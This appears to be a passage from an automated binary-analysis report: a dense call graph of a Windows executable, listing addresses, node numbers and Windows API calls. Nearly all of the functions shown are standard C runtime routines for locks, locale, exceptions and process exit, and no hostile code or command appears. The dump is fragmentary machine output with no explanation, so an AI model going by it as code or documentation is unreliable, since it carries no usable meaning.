10072b2 19736->19742 19802 1000f14 LeaveCriticalSection 19736->19802 19738->19747 19771 1006c90 GetLastError 19738->19771 19740 1004a7b __purecall 23 API calls 19743 10072ba 19740->19743 19742->19740 19745 1006c90 _unexpected 41 API calls 19748 100723a 19745->19748 19746 1006c90 _unexpected 41 API calls 19746->19747 19798 1007254 19747->19798 19748->19733 19749 1006c90 _unexpected 41 API calls 19748->19749 19749->19733 19751 ffe43f __fread_nolock __purecall 19750->19751 19752 ffe46b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19751->19752 19753 ffe53c __purecall 19752->19753 19827 ff9ffe 19753->19827 19755 ffe55a 19755->19557 19757 1006fc1 __FrameHandler3::FrameUnwindToState 19756->19757 19762 1000ecc EnterCriticalSection 19757->19762 19759 1006fcf 19763 100700d 19759->19763 19762->19759 19766 1000f14 LeaveCriticalSection 19763->19766 19765 ffe6a0 19765->19555 19765->19723 19766->19765 19803 ffe56b 19767->19803 19770->19731 19772 1006cac 19771->19772 19773 1006ca6 19771->19773 19775 10079f9 _unexpected 6 API calls 19772->19775 19777 1006cb0 SetLastError 19772->19777 19774 10079ba _unexpected 6 API calls 19773->19774 19774->19772 19776 1006cc8 19775->19776 19776->19777 19778 10074ab _unexpected 14 API calls 19776->19778 19781 1006d40 19777->19781 19782 1006d45 19777->19782 19780 1006cdd 19778->19780 19783 1006ce5 19780->19783 19784 1006cf6 19780->19784 19781->19746 19785 ffe69b __purecall 39 API calls 19782->19785 19786 10079f9 _unexpected 6 API calls 19783->19786 19787 10079f9 _unexpected 6 API calls 19784->19787 19788 1006d4a 19785->19788 19790 1006cf3 19786->19790 19789 1006d02 19787->19789 19791 1006d06 19789->19791 19792 1006d1d 19789->19792 19794 1006f7b ___free_lconv_mon 14 API calls 19790->19794 19793 10079f9 _unexpected 6 API calls 19791->19793 19795 1006abe _unexpected 14 API calls 19792->19795 19793->19790 19794->19777 19796 1006d28 19795->19796 19797 1006f7b ___free_lconv_mon 14 API calls 19796->19797 19797->19777 19799 100722b 19798->19799 19800 100725a 19798->19800 19799->19733 19799->19745 19799->19748 19826 1000f14 LeaveCriticalSection 19800->19826 19802->19742 19804 ffe57d _Fputc 19803->19804 19809 ffe5a2 19804->19809 19806 ffe595 19820 ffe35b 19806->19820 19810 ffe5b9 19809->19810 19811 ffe5b2 19809->19811 19813 ffe397 _Fputc GetLastError SetLastError 19810->19813 19817 ffe5c7 19810->19817 19812 ffe3c0 _Fputc 16 API calls 19811->19812 19812->19810 19814 ffe5ee 19813->19814 19815 ffe64c _Deallocate 11 API calls 19814->19815 19814->19817 19816 ffe61e 19815->19816 19818 ffe56b _Deallocate 41 API calls 19816->19818 19817->19806 19819 ffe62b 19818->19819 19819->19806 19821 ffe367 19820->19821 19822 ffe37e 19821->19822 19823 ffe406 _Fputc 41 API calls 19821->19823 19824 ffe391 19822->19824 19825 ffe406 _Fputc 41 API calls 19822->19825 19823->19822 19824->19733 19825->19824 19826->19799 19828 ffa007 IsProcessorFeaturePresent 19827->19828 19829 ffa006 19827->19829 19831 ffa800 19828->19831 19829->19755 19834 ffa7c3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19831->19834 19833 ffa8e3 19833->19755 19834->19833 19836 100df6e __FrameHandler3::FrameUnwindToState 19835->19836 19838 100df88 19836->19838 19879 1000ecc EnterCriticalSection 19836->19879 19839 100de37 19838->19839 19841 ffe69b __purecall 41 API calls 19838->19841 19846 100db8d 19839->19846 19840 100dfc4 19880 100dfe1 19840->19880 19843 100e001 19841->19843 19844 100df98 19844->19840 19845 1006f7b ___free_lconv_mon 14 API calls 19844->19845 19845->19840 19884 10034ad 19846->19884 19849 100dbc0 19851 100dbd7 19849->19851 19852 100dbc5 GetACP 19849->19852 19850 100dbae GetOEMCP 19850->19851 19851->19519 19853 1007f6f 19851->19853 19852->19851 19854 1007fad 19853->19854 19855 1007f7d _unexpected 19853->19855 19857 1001a7e __strnicoll 14 API calls 19854->19857 19855->19854 19856 1007f98 HeapAlloc 19855->19856 19859 10062a0 codecvt 2 API calls 19855->19859 19856->19855 19858 1007fab 19856->19858 19857->19858 19858->19513 19859->19855 19861 100db8d 43 API calls 19860->19861 19862 100e07d 19861->19862 19864 100e0ba IsValidCodePage 19862->19864 19868 100e0f6 __fread_nolock 19862->19868 19863 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19865 100dea4 19863->19865 19866 100e0cc 19864->19866 19864->19868 19865->19520 19865->19525 19867 100e0fb GetCPInfo 19866->19867 19870 100e0d5 __fread_nolock 19866->19870 19867->19868 19867->19870 19868->19863 19926 100dc61 19870->19926 19872 100da8b __FrameHandler3::FrameUnwindToState 19871->19872 20004 1000ecc EnterCriticalSection 19872->20004 19874 100da95 20005 100dacc 19874->20005 19879->19844 19883 1000f14 LeaveCriticalSection 19880->19883 19882 100dfe8 19882->19838 19883->19882 19885 10034cb 19884->19885 19886 10034c4 19884->19886 19885->19886 19887 1006c90 _unexpected 41 API calls 19885->19887 19886->19849 19886->19850 19888 10034ec 19887->19888 19892 10073ef 19888->19892 19893 1007402 19892->19893 19895 1003502 19892->19895 19893->19895 19900 100f967 19893->19900 19896 100744d 19895->19896 19897 1007460 19896->19897 19898 1007475 19896->19898 19897->19898 19921 100e04a 19897->19921 19898->19886 19901 100f973 __FrameHandler3::FrameUnwindToState 19900->19901 19902 1006c90 _unexpected 41 API calls 19901->19902 19903 100f97c 19902->19903 19904 100f9c2 19903->19904 19913 1000ecc EnterCriticalSection 19903->19913 19904->19895 19906 100f99a 19914 100f9e8 19906->19914 19911 ffe69b __purecall 41 API calls 19912 100f9e7 19911->19912 19913->19906 19915 100f9f6 __Getctype 19914->19915 19917 100f9ab 19914->19917 19916 100f71b __Getctype 14 API calls 19915->19916 19915->19917 19916->19917 19918 100f9c7 19917->19918 19919 1000f14 std::_Lockit::~_Lockit LeaveCriticalSection 19918->19919 19920 100f9be 19919->19920 19920->19904 19920->19911 19922 1006c90 _unexpected 41 API calls 19921->19922 19923 100e04f 19922->19923 19924 100df62 __strnicoll 41 API calls 19923->19924 19925 100e05a 19924->19925 19925->19898 19927 100dc89 GetCPInfo 19926->19927 19928 100dd52 19926->19928 19927->19928 19933 100dca1 19927->19933 19930 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19928->19930 19932 100de0b 19930->19932 19932->19868 19937 1009ce9 19933->19937 19936 1009fe0 45 API calls 19936->19928 19938 10034ad __strnicoll 41 API calls 19937->19938 19939 1009d09 19938->19939 19957 100ced6 19939->19957 19941 1009dcd 19944 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19941->19944 19942 1009dc5 19960 ff982e 19942->19960 19943 1009d36 19943->19941 19943->19942 19946 1007f6f __strnicoll 15 API calls 19943->19946 19948 1009d5b __fread_nolock __alloca_probe_16 19943->19948 19947 1009df0 19944->19947 19946->19948 19952 1009fe0 19947->19952 19948->19942 19949 100ced6 __strnicoll MultiByteToWideChar 19948->19949 19950 1009da6 19949->19950 19950->19942 19951 1009db1 GetStringTypeW 19950->19951 19951->19942 19953 10034ad __strnicoll 41 API calls 19952->19953 19954 1009ff3 19953->19954 19967 1009df2 19954->19967 19958 100cee7 MultiByteToWideChar 19957->19958 19958->19943 19961 ff9838 19960->19961 19963 ff9849 19960->19963 19961->19963 19964 ffe680 19961->19964 19963->19941 19965 1006f7b ___free_lconv_mon 14 API calls 19964->19965 19966 ffe698 19965->19966 19966->19963 19968 1009e0d __strnicoll 19967->19968 19969 100ced6 __strnicoll MultiByteToWideChar 19968->19969 19972 1009e53 19969->19972 19970 1009fcb 19971 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19970->19971 19973 1009fde 19971->19973 19972->19970 19974 1007f6f __strnicoll 15 API calls 19972->19974 19976 1009e79 __alloca_probe_16 19972->19976 19987 1009eff 19972->19987 19973->19936 19974->19976 19975 ff982e __freea 14 API calls 19975->19970 19977 100ced6 __strnicoll MultiByteToWideChar 19976->19977 19976->19987 19978 1009ebe 19977->19978 19978->19987 19995 1007b78 19978->19995 19981 1009ef0 19986 1007b78 std::_Locinfo::_Locinfo_ctor 6 API calls 19981->19986 19981->19987 19982 1009f28 19983 1009fb3 19982->19983 19984 1007f6f __strnicoll 15 API calls 19982->19984 19988 1009f3a __alloca_probe_16 19982->19988 19985 ff982e __freea 14 API calls 19983->19985 19984->19988 19985->19987 19986->19987 19987->19975 19988->19983 19989 1007b78 std::_Locinfo::_Locinfo_ctor 6 API calls 19988->19989 19990 1009f7d 19989->19990 19990->19983 20001 100cf52 19990->20001 19992 1009f97 19992->19983 19993 1009fa0 19992->19993 19994 ff982e __freea 14 API calls 19993->19994 19994->19987 19996 10076aa std::_Lockit::_Lockit 5 API calls 19995->19996 19997 1007b83 19996->19997 19998 1007bd5 __strnicoll 5 API calls 19997->19998 20000 1007b89 19997->20000 19999 1007bc9 LCMapStringW 19998->19999 19999->20000 20000->19981 20000->19982 20000->19987 20002 100cf69 WideCharToMultiByte 20001->20002 20002->19992 20004->19874 20015 100239d 20005->20015 20007 100daee 20008 100239d __fread_nolock 41 API calls 20007->20008 20009 100db0d 20008->20009 20010 100daa2 20009->20010 20011 1006f7b ___free_lconv_mon 14 API calls 20009->20011 20012 100dac0 20010->20012 20011->20010 20029 1000f14 LeaveCriticalSection 20012->20029 20014 100daae 20014->19526 20016 10023ae 20015->20016 20025 10023aa ctype 20015->20025 20017 10023b5 20016->20017 20018 10023c8 __fread_nolock 20016->20018 20019 1001a7e __strnicoll 14 API calls 20017->20019 20022 10023f6 20018->20022 20023 10023ff 20018->20023 20018->20025 20020 10023ba 20019->20020 20021 ffe61f __strnicoll 41 API calls 20020->20021 20021->20025 20024 1001a7e __strnicoll 14 API calls 20022->20024 20023->20025 20027 1001a7e __strnicoll 14 API calls 20023->20027 20026 10023fb 20024->20026 20025->20007 20028 ffe61f __strnicoll 41 API calls 20026->20028 20027->20026 20028->20025 20029->20014 20031 1006851 20030->20031 20032 100685f 20030->20032 20031->20032 20035 1006877 20031->20035 20033 1001a7e __strnicoll 14 API calls 20032->20033 20038 1006867 20033->20038 20034 ffe61f __strnicoll 41 API calls 20036 1006871 20034->20036 20035->20036 20037 1001a7e __strnicoll 14 API calls 20035->20037 20036->19473 20037->20038 20038->20034 20043 1004595 20039->20043 20044 10045c4 20039->20044 20040 10045db 20041 1006f7b ___free_lconv_mon 14 API calls 20040->20041 20041->20043 20042 1006f7b ___free_lconv_mon 14 API calls 20042->20044 20043->19474 20044->20040 20044->20042 20046 ffe658 20045->20046 20047 ffe423 __purecall 8 API calls 20046->20047 20048 ffe66d GetCurrentProcess TerminateProcess 20047->20048 20048->19480 20050 ff225e _strlen 20049->20050 20067 ff194d 20050->20067 20052 ff226b 20052->19284 20054 ff4848 20053->20054 20056 ff481e std::_Throw_Cpp_error 20053->20056 20141 ff1c48 20054->20141 20056->19286 20161 ff1d76 20057->20161 20059 ff1d6e 20060 ff4dbc 20059->20060 20334 ff3bca 20060->20334 20062 ff4dd6 20062->19293 20064 ff462e 20063->20064 20065 ff4637 20063->20065 20066 ff1afa _Deallocate 41 API calls 20064->20066 20065->19297 20066->20065 20068 ff19b8 20067->20068 20071 ff195e std::_Throw_Cpp_error 20067->20071 20082 ff47b9 20068->20082 20073 ff1965 std::_Throw_Cpp_error 20071->20073 20074 ff1872 20071->20074 20073->20052 20075 ff187d 20074->20075 20077 ff1885 20074->20077 20085 ff1894 20075->20085 20078 ff1891 20077->20078 20098 ff9cb4 20077->20098 20078->20073 20122 ff55eb 20082->20122 20086 ff452b Concurrency::cancel_current_task 20085->20086 20087 ff18a3 20085->20087 20110 ffb012 20086->20110 20088 ff9cb4 codecvt 16 API calls 20087->20088 20089 ff18a9 20088->20089 20089->20086 20090 ff1883 20089->20090 20093 ffe62f 20089->20093 20090->20073 20092 ff4547 20094 ffe56b _Deallocate 41 API calls 20093->20094 20095 ffe63e 20094->20095 20096 ffe64c _Deallocate 11 API calls 20095->20096 20097 ffe64b 20096->20097 20100 ff9cb9 20098->20100 20101 ff188f 20100->20101 20102 10062a0 codecvt 2 API calls 20100->20102 20103 ff9cd5 20100->20103 20113 1000f42 20100->20113 20101->20073 20102->20100 20104 ff452b Concurrency::cancel_current_task 20103->20104 20105 ff9cdf codecvt 20103->20105 20106 ffb012 Concurrency::cancel_current_task RaiseException 20104->20106 20108 ffb012 Concurrency::cancel_current_task RaiseException 20105->20108 20107 ff4547 20106->20107 20109 ffa7b1 20108->20109 20111 ffb02c 20110->20111 20112 ffb059 RaiseException 20110->20112 20111->20112 20112->20092 20114 1007f6f 20113->20114 20115 1007fad 20114->20115 20116 1007f98 HeapAlloc 20114->20116 20121 1007f81 _unexpected 20114->20121 20117 1001a7e __strnicoll 14 API calls 20115->20117 20118 1007fab 20116->20118 20116->20121 20119 1007fb2 20117->20119 20118->20119 20119->20100 20120 10062a0 codecvt 2 API calls 20120->20121 20121->20115 20121->20116 20121->20120 20127 ff5582 20122->20127 20125 ffb012 Concurrency::cancel_current_task RaiseException 20126 ff560a 20125->20126 20130 ff26dd 20127->20130 20133 ffaf90 20130->20133 20134 ff2709 20133->20134 20135 ffaf9d 20133->20135 20134->20125 20135->20134 20136 1000f42 _Yarn 15 API calls 20135->20136 20137 ffafba 20136->20137 20138 ffafca 20137->20138 20139 1006843 ___std_exception_copy 41 API calls 20137->20139 20140 ffe680 __freea 14 API calls 20138->20140 20139->20138 20140->20134 20142 ff1cd1 20141->20142 20143 ff1c61 std::_Throw_Cpp_error 20141->20143 20144 ff47b9 std::_Throw_Cpp_error 43 API calls 20142->20144 20146 ff1872 std::_Throw_Cpp_error 43 API calls 20143->20146 20145 ff1cd6 20144->20145 20148 ff1c80 std::_Throw_Cpp_error 20146->20148 20147 ff1cb6 std::_Throw_Cpp_error 20147->20056 20148->20147 20150 ff1afa 20148->20150 20151 ff1b07 20150->20151 20153 ff1b14 _Deallocate 20150->20153 20154 ff3311 20151->20154 20153->20147 20155 ff332e 20154->20155 20156 ff332b 20154->20156 20157 ffe56b _Deallocate 41 API calls 20155->20157 20156->20153 20158 ffe63e 20157->20158 20159 ffe64c _Deallocate 11 API calls 20158->20159 20160 ffe64b 20159->20160 20166 ff1b90 20161->20166 20163 ff1d8f 20177 ff3b05 20163->20177 20165 ff1da4 20165->20059 20167 ff1bc9 20166->20167 20168 ff1b99 20166->20168 20169 ff9cb4 codecvt 16 API calls 20167->20169 20168->20167 20170 ff1b9e 20168->20170 20171 ff1bd3 20169->20171 20172 ff9cb4 codecvt 16 API calls 20170->20172 20173 ff1be4 20171->20173 20182 ff140c 20171->20182 20176 ff1ba9 20172->20176 20173->20163 20175 ff1be3 20175->20163 20176->20163 20178 ff3b0d 20177->20178 20179 ff3b1b 20178->20179 20326 ff4565 20178->20326 20179->20165 20183 ff141d 20182->20183 20188 ff293b 20183->20188 20185 ff143a 20191 ff1e34 20185->20191 20187 ff1444 shared_ptr 20187->20175 20200 ff3a98 20188->20200 20190 ff2949 20190->20185 20227 ff47cf 20191->20227 20194 ff1afa _Deallocate 41 API calls 20196 ff1e6d 20194->20196 20230 ff1303 20196->20230 20199 ff1e86 20199->20187 20203 ff1dee InitOnceBeginInitialize 20200->20203 20202 ff3aa8 20202->20190 20204 ff1e29 20203->20204 20205 ff1e08 20203->20205 20206 ffe69b __purecall 41 API calls 20204->20206 20209 ff1e26 20205->20209 20210 ff3ab1 20205->20210 20206->20209 20209->20202 20211 ff1e12 InitOnceComplete 20210->20211 20212 ff3ad6 20210->20212 20211->20209 20218 ff9f99 AcquireSRWLockExclusive 20212->20218 20214 ff3ae2 20214->20211 20223 ff9f33 20214->20223 20219 ff9fad 20218->20219 20220 ff9fb2 ReleaseSRWLockExclusive 20219->20220 20222 ff9fe8 SleepConditionVariableSRW 20219->20222 20220->20214 20222->20219 20224 ff9f06 44 API calls 20223->20224 20225 ff3af6 20224->20225 20226 ff9f48 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 20225->20226 20226->20211 20247 ff2cea 20227->20247 20231 ff1326 20230->20231 20264 ff36d6 20231->20264 20233 ff1342 20234 ff1367 20233->20234 20270 ff22fa 20233->20270 20273 ff43ca 20234->20273 20238 ff13b2 20239 ff13c2 20238->20239 20276 ff45fd 20238->20276 20280 ff1cd7 20239->20280 20240 ff1afa _Deallocate 41 API calls 20240->20238 20244 ff2c50 20245 ff45fd 41 API calls 20244->20245 20246 ff2c5b Concurrency::details::_CancellationTokenRegistration::~_CancellationTokenRegistration 20245->20246 20246->20199 20248 ff1e57 20247->20248 20249 ff2cf5 20247->20249 20248->20194 20248->20196 20251 ff18bf 20249->20251 20252 ff18d6 20251->20252 20254 ff18dc 20251->20254 20255 ff3600 20252->20255 20254->20248 20256 ff3654 20255->20256 20259 ff360d 20255->20259 20257 ff47c4 43 API calls 20256->20257 20258 ff3659 20257->20258 20258->20254 20260 ff362f 20259->20260 20261 ff1afa _Deallocate 41 API calls 20259->20261 20262 ff47ea 43 API calls 20260->20262 20261->20260 20263 ff3643 20262->20263 20263->20254 20265 ff36f5 20264->20265 20286 ff1ef9 20265->20286 20267 ff3753 shared_ptr 20267->20233 20268 ff3712 shared_ptr 20268->20267 20289 ff4043 20268->20289 20305 ff1a71 20270->20305 20272 ff231d 20272->20234 20274 ff2cea 43 API calls 20273->20274 20275 ff1392 20274->20275 20275->20238 20275->20240 20277 ff4605 20276->20277 20279 ff4615 20276->20279 20278 ff1afa _Deallocate 41 API calls 20277->20278 20278->20279 20279->20239 20281 ff1cf5 20280->20281 20282 ff9cb4 codecvt 16 API calls 20281->20282 20283 ff1cfc 20282->20283 20316 ff4330 20283->20316 20285 ff13ce 20285->20244 20287 ff9cb4 codecvt 16 API calls 20286->20287 20288 ff1f03 20287->20288 20288->20268 20290 ff4060 20289->20290 20291 ff9cb4 codecvt 16 API calls 20290->20291 20292 ff4067 20291->20292 20295 ff3fe5 20292->20295 20294 ff4085 20294->20267 20296 ff4009 20295->20296 20304 ff402e 20295->20304 20298 ff4eb2 50 API calls 20296->20298 20297 ff3dcf 53 API calls 20299 ff403d 20297->20299 20300 ff4014 20298->20300 20299->20294 20301 ff4028 20300->20301 20303 ff4f86 16 API calls 20300->20303 20302 ff615f ReleaseSRWLockExclusive 20301->20302 20302->20304 20303->20301 20304->20297 20304->20299 20306 ff1a84 20305->20306 20307 ff1a7b 20305->20307 20306->20272 20309 ff3355 20307->20309 20310 ff337b 20309->20310 20311 ff3365 20309->20311 20313 ff47c4 43 API calls 20310->20313 20312 ff47ea 43 API calls 20311->20312 20314 ff336b 20312->20314 20315 ff3380 20313->20315 20314->20306 20317 ff433c __EH_prolog3_catch 20316->20317 20318 ff4351 Concurrency::details::_ContextCallback::_CallInContext 20317->20318 20320 ff42fe 20317->20320 20318->20285 20321 ff430a 20320->20321 20322 ff4312 20320->20322 20323 ff40e7 103 API calls 20321->20323 20324 ff430f 20322->20324 20325 ff5191 49 API calls 20322->20325 20323->20324 20324->20318 20325->20324 20331 ff278e 20326->20331 20329 ffb012 Concurrency::cancel_current_task RaiseException 20330 ff4584 20329->20330 20332 ff26dd std::exception::exception 42 API calls 20331->20332 20333 ff279b 20332->20333 20333->20329 20335 ff3bd2 20334->20335 20336 ff4565 43 API calls 20335->20336 20337 ff3beb 20336->20337 20338 ff3bfe 20337->20338 20342 ff4712 20337->20342 20351 ff3f29 20338->20351 20343 ff471e __EH_prolog3_catch 20342->20343 20344 ff4737 20343->20344 20356 ff32e2 20343->20356 20345 ff32e2 53 API calls 20344->20345 20347 ff475a 20344->20347 20345->20347 20348 ff4762 Concurrency::details::_ContextCallback::_CallInContext 20347->20348 20363 ff40be 20347->20363 20348->20338 20477 ff27cd 20351->20477 20353 ffb012 Concurrency::cancel_current_task RaiseException 20354 ff3f3c 20353->20354 20354->20351 20354->20353 20355 ff470d 20354->20355 20355->20355 20367 ff4eb2 20356->20367 20358 ff32f1 20359 ff3305 20358->20359 20373 ff62fa 20358->20373 20378 ff615f 20359->20378 20364 ff40c6 20363->20364 20463 ff5186 20364->20463 20381 ff614e 20367->20381 20369 ff4ebb 20371 ff4ecf 20369->20371 20384 ff64ff 20369->20384 20371->20358 20455 ff62a9 20373->20455 20377 ff631a 20377->20358 20379 ff616b ReleaseSRWLockExclusive 20378->20379 20380 ff330a 20378->20380 20379->20380 20380->20344 20390 ff617d GetCurrentThreadId 20381->20390 20385 ff6515 std::_Throw_Cpp_error 20384->20385 20411 ff6408 20385->20411 20391 ff61a7 20390->20391 20392 ff61c6 20390->20392 20395 ff61ac AcquireSRWLockExclusive 20391->20395 20401 ff61bc 20391->20401 20393 ff61cf 20392->20393 20394 ff61e6 20392->20394 20396 ff61da AcquireSRWLockExclusive 20393->20396 20393->20401 20397 ff6245 20394->20397 20403 ff61fe 20394->20403 20395->20401 20396->20401 20399 ff624c TryAcquireSRWLockExclusive 20397->20399 20397->20401 20398 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20400 ff615b 20398->20400 20399->20401 20400->20369 20401->20398 20403->20401 20404 ff6235 TryAcquireSRWLockExclusive 20403->20404 20405 ff954d 20403->20405 20404->20401 20404->20403 20408 ff958b 20405->20408 20407 ff9558 __aulldiv __aullrem 20407->20403 20409 ff9a0e __Xtime_get_ticks GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime 20408->20409 20410 ff9599 20409->20410 20410->20407 20412 ff6414 __EH_prolog3_GS 20411->20412 20413 ff2241 std::_Throw_Cpp_error 43 API calls 20412->20413 20414 ff6428 20413->20414 20421 ff24ce 20414->20421 20417 ff4623 std::_Throw_Cpp_error 41 API calls 20418 ff6445 20417->20418 20432 ffa020 20418->20432 20435 ff220d 20421->20435 20428 ff4623 std::_Throw_Cpp_error 41 API calls 20429 ff2511 20428->20429 20430 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20429->20430 20431 ff2530 20430->20431 20431->20417 20433 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20432->20433 20434 ffa02a 20433->20434 20434->20434 20436 ff222d 20435->20436 20437 ff19be std::_Throw_Cpp_error 43 API calls 20436->20437 20438 ff223a 20437->20438 20439 ff3e77 20438->20439 20440 ff3e91 _strlen 20439->20440 20441 ff3ea8 20439->20441 20443 ff4808 std::_Throw_Cpp_error 43 API calls 20440->20443 20442 ff4808 std::_Throw_Cpp_error 43 API calls 20441->20442 20444 ff3ecf 20442->20444 20443->20441 20445 ff4623 std::_Throw_Cpp_error 41 API calls 20444->20445 20446 ff3ed7 std::_Throw_Cpp_error 20445->20446 20447 ff4623 std::_Throw_Cpp_error 41 API calls 20446->20447 20448 ff3eea 20447->20448 20449 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20448->20449 20450 ff24fe 20449->20450 20451 ff2815 20450->20451 20452 ff2822 20451->20452 20453 ff26dd std::exception::exception 42 API calls 20452->20453 20454 ff2509 20453->20454 20454->20428 20462 ff62c4 SleepConditionVariableSRW 20455->20462 20457 ff62b6 20458 ff62ba 20457->20458 20459 ffe69b __purecall 41 API calls 20457->20459 20461 ff6320 GetCurrentThreadId 20458->20461 20460 ff62c3 20459->20460 20461->20377 20462->20457 20466 ff6055 20463->20466 20467 ff6070 __InternalCxxFrameHandler 20466->20467 20472 ff6086 20466->20472 20470 ffb012 Concurrency::cancel_current_task RaiseException 20467->20470 20468 ff60f7 RaiseException 20469 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20468->20469 20471 ff5190 20469->20471 20470->20472 20472->20468 20473 ff6119 20472->20473 20476 ff60d7 __alloca_probe_16 20472->20476 20474 ffe69b __purecall 41 API calls 20473->20474 20475 ff611e 20474->20475 20476->20468 20478 ff26dd std::exception::exception 42 API calls 20477->20478 20479 ff27d9 20478->20479 20479->20354 20481 10048cc 20480->20481 20482 10048de 20480->20482 20507 1004967 GetModuleHandleW 20481->20507 20492 1004767 20482->20492 20487 ff9ca1 20487->19323 20491 1004930 20493 1004773 __FrameHandler3::FrameUnwindToState 20492->20493 20515 1000ecc EnterCriticalSection 20493->20515 20495 100477d 20516 10047b4 20495->20516 20497 100478a 20520 10047a8 20497->20520 20500 1004936 20545 10049aa 20500->20545 20503 1004954 20505 10049cc __purecall 3 API calls 20503->20505 20504 1004944 GetCurrentProcess TerminateProcess 20504->20503 20506 100495c ExitProcess 20505->20506 20508 10048d1 20507->20508 20508->20482 20509 10049cc GetModuleHandleExW 20508->20509 20510 1004a0b GetProcAddress 20509->20510 20511 1004a2c 20509->20511 20510->20511 20512 1004a1f 20510->20512 20513 1004a32 FreeLibrary 20511->20513 20514 10048dd 20511->20514 20512->20511 20513->20514 20514->20482 20515->20495 20517 10047c0 __FrameHandler3::FrameUnwindToState 20516->20517 20518 1004827 __purecall 20517->20518 20523 10065d1 20517->20523 20518->20497 20544 1000f14 LeaveCriticalSection 20520->20544 20522 1004796 20522->20487 20522->20500 20524 10065dd __EH_prolog3 20523->20524 20527 1006329 20524->20527 20526 1006604 Concurrency::details::_ContextCallback::_CallInContext 20526->20518 20528 1006335 __FrameHandler3::FrameUnwindToState 20527->20528 20535 1000ecc EnterCriticalSection 20528->20535 20530 1006343 20536 10064e1 20530->20536 20535->20530 20537 1006500 20536->20537 20538 1006350 20536->20538 20537->20538 20539 1006f7b ___free_lconv_mon 14 API calls 20537->20539 20540 1006378 20538->20540 20539->20538 20543 1000f14 LeaveCriticalSection 20540->20543 20542 1006361 20542->20526 20543->20542 20544->20522 20550 100c44b GetPEB 20545->20550 20548 10049b4 GetPEB 20549 1004940 20548->20549 20549->20503 20549->20504 20551 100c465 20550->20551 20553 10049af 20550->20553 20554 100782c 20551->20554 20553->20548 20553->20549 20555 10077a9 std::_Lockit::_Lockit 5 API calls 20554->20555 20556 1007848 20555->20556 20556->20553 20559 1006783 20557->20559 20560 1006795 ___scrt_uninitialize_crt 20557->20560 20558 1006791 20558->19317 20559->20558 20562 1001ef1 20559->20562 20560->19317 20565 1001d7e 20562->20565 20568 1001c72 20565->20568 20569 1001c7e __FrameHandler3::FrameUnwindToState 20568->20569 20576 1000ecc EnterCriticalSection 20569->20576 20571 1001c88 ___scrt_uninitialize_crt 20572 1001cf4 20571->20572 20577 1001be6 20571->20577 20585 1001d12 20572->20585 20576->20571 20578 1001bf2 __FrameHandler3::FrameUnwindToState 20577->20578 20588 fff297 EnterCriticalSection 20578->20588 20580 1001bfc ___scrt_uninitialize_crt 20581 1001c35 20580->20581 20589 1001e8c 20580->20589 20602 1001c66 20581->20602 20704 1000f14 LeaveCriticalSection 20585->20704 20587 1001d00 20587->20558 20588->20580 20590 1001ea1 _Fputc 20589->20590 20591 1001eb3 20590->20591 20592 1001ea8 20590->20592 20605 1001e23 20591->20605 20594 1001d7e ___scrt_uninitialize_crt 70 API calls 20592->20594 20595 1001eae 20594->20595 20597 ffe35b _Fputc 41 API calls 20595->20597 20599 1001eeb 20597->20599 20599->20581 20600 1001ed4 20618 100a33e 20600->20618 20703 fff2ab LeaveCriticalSection 20602->20703 20604 1001c54 20604->20571 20606 1001e3c 20605->20606 20610 1001e63 20605->20610 20607 1008e15 _Fputc 41 API calls 20606->20607 20606->20610 20608 1001e58 20607->20608 20629 100ab69 20608->20629 20610->20595 20611 1008e15 20610->20611 20612 1008e21 20611->20612 20613 1008e36 20611->20613 20614 1001a7e __strnicoll 14 API calls 20612->20614 20613->20600 20615 1008e26 20614->20615 20616 ffe61f __strnicoll 41 API calls 20615->20616 20617 1008e31 20616->20617 20617->20600 20619 100a35c 20618->20619 20620 100a34f 20618->20620 20622 100a3a5 20619->20622 20625 100a383 20619->20625 20621 1001a7e __strnicoll 14 API calls 20620->20621 20628 100a354 20621->20628 20623 1001a7e __strnicoll 14 API calls 20622->20623 20624 100a3aa 20623->20624 20627 ffe61f __strnicoll 41 API calls 20624->20627 20670 100a29c 20625->20670 20627->20628 20628->20595 20630 100ab75 __FrameHandler3::FrameUnwindToState 20629->20630 20631 100ac39 20630->20631 20633 100abca 20630->20633 20639 100ab7d 20630->20639 20632 ffe5a2 _Fputc 41 API calls 20631->20632 20632->20639 20640 100e87a EnterCriticalSection 20633->20640 20635 100abd0 20636 100abed 20635->20636 20641 100ac71 20635->20641 20667 100ac31 20636->20667 20639->20610 20640->20635 20642 100ac96 20641->20642 20643 100acb9 __fread_nolock 20641->20643 20644 100ac9a 20642->20644 20646 100acf8 20642->20646 20643->20636 20645 ffe5a2 _Fputc 41 API calls 20644->20645 20645->20643 20647 100ad0f 20646->20647 20648 100c3d1 ___scrt_uninitialize_crt 43 API calls 20646->20648 20649 100a7f5 ___scrt_uninitialize_crt 42 API calls 20647->20649 20648->20647 20650 100ad19 20649->20650 20651 100ad5f 20650->20651 20652 100ad1f 20650->20652 20655 100adc2 WriteFile 20651->20655 20656 100ad73 20651->20656 20653 100ad26 20652->20653 20654 100ad49 20652->20654 20653->20643 20661 100a78d ___scrt_uninitialize_crt 6 API calls 20653->20661 20657 100a3bb ___scrt_uninitialize_crt 47 API calls 20654->20657 20655->20643 20658 100ade4 GetLastError 20655->20658 20659 100adb0 20656->20659 20660 100ad7b 20656->20660 20657->20643 20658->20643 20662 100a873 ___scrt_uninitialize_crt 7 API calls 20659->20662 